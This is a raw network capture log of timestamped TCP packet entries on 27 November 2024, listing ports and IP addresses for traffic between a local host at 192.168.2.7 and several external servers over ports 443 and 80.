                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.466383934 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.466448069 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.514313936 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.514328957 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.514631987 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.516865969 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.516917944 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.516953945 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.630532026 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.630629063 CET4434978194.245.104.56192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.630734921 CET49781443192.168.2.794.245.104.56
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.630776882 CET49797443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.632850885 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.632869959 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.632920980 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.635317087 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.635325909 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.653774023 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.654592991 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.654627085 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.655050039 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.655056953 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.671329975 CET44349797172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.688697100 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.689357042 CET49791443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.689369917 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.689691067 CET4434979213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.690102100 CET49791443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.690107107 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.690285921 CET49792443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.690306902 CET4434979213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.690726995 CET49792443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.690732002 CET4434979213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.691803932 CET4434979313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.692320108 CET49793443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.692348003 CET4434979313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.692806005 CET49793443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.692811012 CET4434979313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.702960968 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.703396082 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.703413963 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.703900099 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.703907013 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.867923021 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.868004084 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.870578051 CET49809443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.870609999 CET44349809172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.870815992 CET49809443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.871381998 CET49809443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.871396065 CET44349809172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.871767998 CET49810443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.871803045 CET44349810172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.872545004 CET49810443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.872778893 CET49810443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.872792959 CET44349810172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.877964020 CET49811443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.878005981 CET44349811162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.878060102 CET49811443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.878551960 CET49811443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.878567934 CET44349811162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.086685896 CET44349797172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.086765051 CET49797443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.100018024 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.100099087 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.100167036 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.137106895 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.137154102 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.137168884 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.137178898 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.143019915 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.143098116 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.143481016 CET49791443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.145847082 CET49791443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.145847082 CET49791443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.145867109 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.145878077 CET4434979113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.145893097 CET4434979313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.145948887 CET4434979313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.146049976 CET49793443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.147315979 CET49793443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.147322893 CET4434979313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.152478933 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.152515888 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.152726889 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.153290033 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.153301954 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.154062986 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.154102087 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.154172897 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.154294968 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.154309988 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.155113935 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.155124903 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.155215979 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.155334949 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.155344963 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.156542063 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.156614065 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.156757116 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.156774044 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.156784058 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.156794071 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.156799078 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.158643961 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.158653021 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.158832073 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.159046888 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.159059048 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.326631069 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.326699018 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.327285051 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.329248905 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.329262972 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.329272985 CET49786443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.329278946 CET4434978620.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.416589022 CET49822443192.168.2.718.165.220.110
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.416631937 CET4434982218.165.220.110192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.417099953 CET49822443192.168.2.718.165.220.110
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.417526007 CET49822443192.168.2.718.165.220.110
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.417543888 CET4434982218.165.220.110192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.470901012 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.478241920 CET49827443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.478265047 CET4434982720.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.478347063 CET49827443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.479254961 CET49827443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.479265928 CET4434982720.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.561526060 CET49829443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.561543941 CET4434982920.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.561614037 CET49829443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.561798096 CET49829443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.561810017 CET4434982920.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.572195053 CET49830443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.572252989 CET44349830172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.572309017 CET49830443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.572632074 CET49830443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.572647095 CET44349830172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.590866089 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.683276892 CET49831443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.683316946 CET44349831172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.683394909 CET49831443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.683763981 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.683810949 CET44349832162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.683883905 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.684111118 CET49831443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.684127092 CET44349831172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.684267044 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.684289932 CET44349832162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915287971 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915349007 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915359974 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915369987 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915415049 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915427923 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915440083 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915477037 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915595055 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915606022 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915616035 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915628910 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915642977 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915663004 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.921629906 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.921688080 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.921696901 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.921726942 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.930027962 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.930079937 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.035499096 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.035582066 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.107255936 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.107326031 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.107373953 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.107412100 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.111229897 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.111278057 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.111326933 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.111382008 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.119005919 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.119158983 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.121963024 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.122056007 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.122091055 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.122134924 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.129730940 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.129776001 CET44349809172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.129796982 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.129815102 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.130029917 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.130723000 CET49809443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.130733967 CET44349809172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.131731033 CET44349809172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.131788015 CET49809443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.131877899 CET44349811162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.133157969 CET44349810172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.137602091 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.137700081 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.137770891 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.139051914 CET49809443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.139113903 CET44349809172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.139327049 CET49811443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.139355898 CET44349811162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.139471054 CET49810443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.139480114 CET44349810172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.139708042 CET49809443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.139715910 CET44349809172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.140464067 CET44349811162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.140517950 CET49811443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.141212940 CET44349810172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.141315937 CET49810443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.142296076 CET49811443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.142358065 CET44349811162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.142843962 CET49810443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.142913103 CET44349810172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.142931938 CET49811443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.142945051 CET44349811162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.143335104 CET49810443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.143343925 CET44349810172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.145464897 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.145517111 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.145570993 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.145612001 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.153320074 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.153373957 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.153403044 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.153500080 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.161179066 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.161304951 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.161354065 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.169056892 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.169121027 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.169159889 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.169203043 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.177009106 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.177052021 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.177109003 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.183960915 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.183973074 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.184019089 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.192266941 CET49809443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.192342997 CET49811443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.212615013 CET49810443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.299151897 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.299209118 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.299263000 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.299354076 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.300533056 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.300626993 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.300748110 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.300915956 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.305296898 CET8049785185.215.113.206192.168.2.7
